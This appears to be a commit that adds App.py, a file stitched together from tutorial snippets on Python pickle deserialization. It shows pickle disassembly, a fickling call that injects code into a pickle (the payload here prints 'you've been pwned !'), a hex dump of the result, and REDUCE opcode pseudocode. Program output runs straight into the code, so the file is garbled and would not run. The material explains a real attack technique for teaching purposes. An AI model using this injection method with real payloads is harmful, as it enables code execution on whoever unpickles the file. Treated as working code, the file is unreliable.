Create App.py
Browse files
App.py
ADDED
|
@@ -0,0 +1,70 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
import pickle
|
| 2 |
+
import pickletools
|
| 3 |
+
|
| 4 |
+
var = "data I want to share with a friend"
|
| 5 |
+
|
| 6 |
+
# store the pickle data in a file named 'payload.pkl'
|
| 7 |
+
with open('payload.pkl', 'wb') as f:
|
| 8 |
+
pickle.dump(var, f)
|
| 9 |
+
|
| 10 |
+
# disassemble the pickle
|
| 11 |
+
# and print the instructions to the command line
|
| 12 |
+
with open('payload.pkl', 'rb') as f:
|
| 13 |
+
pickletools.dis(f) 0: \x80 PROTO 4
|
| 14 |
+
2: \x95 FRAME 48
|
| 15 |
+
11: \x8c SHORT_BINUNICODE 'data I want to share with a friend'
|
| 16 |
+
57: \x94 MEMOIZE (as 0)
|
| 17 |
+
58: . STOP
|
| 18 |
+
highest protocol among opcodes = 4import pickle
|
| 19 |
+
import pickletools
|
| 20 |
+
|
| 21 |
+
class Data:
|
| 22 |
+
def __init__(self, important_stuff: str):
|
| 23 |
+
self.important_stuff = important_stuff
|
| 24 |
+
|
| 25 |
+
d = Data("42")
|
| 26 |
+
|
| 27 |
+
with open('payload.pkl', 'wb') as f:
|
| 28 |
+
pickle.dump(d, f)from fickling.pickle import Pickled
|
| 29 |
+
import pickle
|
| 30 |
+
|
| 31 |
+
# Create a malicious pickle
|
| 32 |
+
data = "my friend needs to know this"
|
| 33 |
+
|
| 34 |
+
pickle_bin = pickle.dumps(data)
|
| 35 |
+
|
| 36 |
+
p = Pickled.load(pickle_bin)
|
| 37 |
+
|
| 38 |
+
p.insert_python_exec('print("you\'ve been pwned !")')
|
| 39 |
+
|
| 40 |
+
with open('payload.pkl', 'wb') as f:
|
| 41 |
+
p.dump(f)
|
| 42 |
+
|
| 43 |
+
# innocently unpickle and get your friend's data
|
| 44 |
+
with open('payload.pkl', 'rb') as f:
|
| 45 |
+
data = pickle.load(f)
|
| 46 |
+
print(data)you've been pwned !
|
| 47 |
+
my friend needs to know this# cat payload.pkl
|
| 48 |
+
c__builtin__
|
| 49 |
+
exec
|
| 50 |
+
(Vprint("you've been pwned !")
|
| 51 |
+
tR my friend needs to know this.%
|
| 52 |
+
|
| 53 |
+
# hexyl payload.pkl
|
| 54 |
+
ββββββββββ¬ββββββββββββββββββββββββββ¬ββββββββββββββββββββββββββ¬βββββββββ¬βββββββββ
|
| 55 |
+
β00000000β 63 5f 5f 62 75 69 6c 74 β 69 6e 5f 5f 0a 65 78 65 βc__builtβin___exeβ
|
| 56 |
+
β00000010β 63 0a 28 56 70 72 69 6e β 74 28 22 79 6f 75 27 76 βc_(Vprinβt("you'vβ
|
| 57 |
+
β00000020β 65 20 62 65 65 6e 20 70 β 77 6e 65 64 20 21 22 29 βe been pβwned !")β
|
| 58 |
+
β00000030β 0a 74 52 80 04 95 20 00 β 00 00 00 00 00 00 8c 1c β_tRΓβ’Γ 0β000000Γβ’β
|
| 59 |
+
β00000040β 6d 79 20 66 72 69 65 6e β 64 20 6e 65 65 64 73 20 βmy frienβd needs β
|
| 60 |
+
β00000050β 74 6f 20 6b 6e 6f 77 20 β 74 68 69 73 94 2e βto know βthisΓ. β
|
| 61 |
+
ββββββββββ΄ββββββββββββββββββββββββββ΄ββββββββββββββββββββββββββ΄βββββββββ΄βββββββββ# ...
|
| 62 |
+
opcodes_stack = [exec_func, "malicious argument", "REDUCE"]
|
| 63 |
+
opcode = stack.pop()
|
| 64 |
+
if opcode == "REDUCE":
|
| 65 |
+
arg = opcodes_stack.pop()
|
| 66 |
+
callable = opcodes_stack.pop()
|
| 67 |
+
opcodes_stack.append(callable(arg))
|
| 68 |
+
# ...from transformers import AutoModel
|
| 69 |
+
|
| 70 |
+
model = AutoModel.from_pretrained("bert-base-cased", from_flax=True)
|